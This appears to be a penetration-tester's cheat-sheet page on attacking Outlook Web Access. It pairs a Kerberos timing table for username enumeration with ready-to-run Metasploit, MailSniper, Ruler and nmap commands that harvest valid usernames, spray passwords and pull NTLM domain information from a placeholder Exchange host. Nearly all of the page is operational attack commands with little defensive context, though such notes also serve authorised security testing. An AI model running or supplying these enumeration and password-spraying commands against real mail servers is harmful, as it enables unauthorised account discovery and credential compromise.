OWA

Outlook Web Access

Enumerate Users

Authentication Request	Kerberos Process	Response Time
Non-existing realm	KDC searches for realm	2-3 seconds
Realm exists but username does not exist	Pre-authentication ticket created to verify username	5-60 seconds
Realm and username exists	Pre-authentication ticket created to verify password	< 2 seconds

Authentication Request

Kerberos Process

Response Time

Non-existing realm

KDC searches for realm

2-3 seconds

Realm exists but username does not exist

Pre-authentication ticket created to verify username

5-60 seconds

Realm and username exists

Pre-authentication ticket created to verify password

< 2 seconds

"Responses in different environments may have different response times but the pattern in the timing response behavior still exist." (ref)

MSF

msf > use auxiliary/scanner/http/owa_login
msf > set RHOST mx.megacorp.local
msf > set USER_FILE owa-users.txt
msf > set PASSWORD dummyPassword
msf > set THREADS 15
msf > run

MailSniper

https://github.com/dafthack/MailSniper

PS > Invoke-UsernameHarvestOWA -ExchHostname mx.megacorp.com -Domain MEGACORP -UserList .\owa-users.txt -Threads 25 -OutFile owa-valid-users.txt

Password Spray

Ruler

https://github.com/sensepost/ruler/wiki/Brute-Force#brute-force-for-credentials

Autodiscover URL implicit:

$ ./ruler -k -d megacorp.com brute --users users.txt --passwords passwords.txt --delay 35 --attempts 3 --verbose | tee -a ruler-blood.out

Autodiscover URL explicit:

$ ./ruler -k --nocache --url https://autodiscover.megacorp.com/autodiscover/autodiscover.xml -d megacorp.com brute --users users.txt --passwords passwords.txt --delay 35 --attempts 3 --verbose | tee -a ruler-all.out

Notes:

In users.txt there's only "username" on a line, not "DOMAIN\username".
Errors like ERROR: 04:27:43 brute.go:193: An error occured in connection - Get https://autodiscover.megacorp.com/autodiscover/autodiscover.xml: Get https://autodiscover.megacorp.com/autodiscover/autodiscover.xml: net/http: request canceled do not affect the current password probe.

Enumerate NTLM

Nmap

$ sudo nmap -sV --script http-ntlm-info --script-args http-ntlm-info.root=/ews/ -p443 mx.megacorp.com

MSF

msf > use auxiliary/scanner/http/owa_login
msf > set AUTH_TIME false
msf > set RHOST mx.megacorp.local
msf > set USERNAME dummyUser
msf > set PASSWORD dummyPassword
msf > run

MailSniper

https://github.com/dafthack/MailSniper

PS > Invoke-DomainHarvestOWA -ExchHostname mx.megacorp.com

Last updated 2 years ago